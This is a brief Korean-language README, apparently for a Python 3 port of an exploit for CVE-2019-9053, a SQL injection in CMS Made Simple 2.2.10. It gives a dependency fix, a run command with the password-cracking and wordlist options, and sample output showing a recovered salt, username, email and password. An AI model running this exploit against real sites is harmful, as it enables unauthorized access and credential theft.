
CMS Made Simple 2.2.10의 CVE-2019-9053 SQL 인젝션을 위한 Python 익스플로잇으로, 비밀번호 해시 크래킹 및 사용자 열거 기능을 갖추고 있습니다.
이 익스플로잇은 Python 3를 지원하도록 수정되었습니다.
Traceback (most recent call last): File "46635.py", line 12, in from termcolor import colored ImportError: No module named termcolor
pip install termcolor
python cve.py -u http://target --crack -w /usr/share/wordlists/best110.txt
[+] Salt for password found: 18
[+] Username found: mitw
[+] Email found: adk
[+] Password found: 0c01f4468d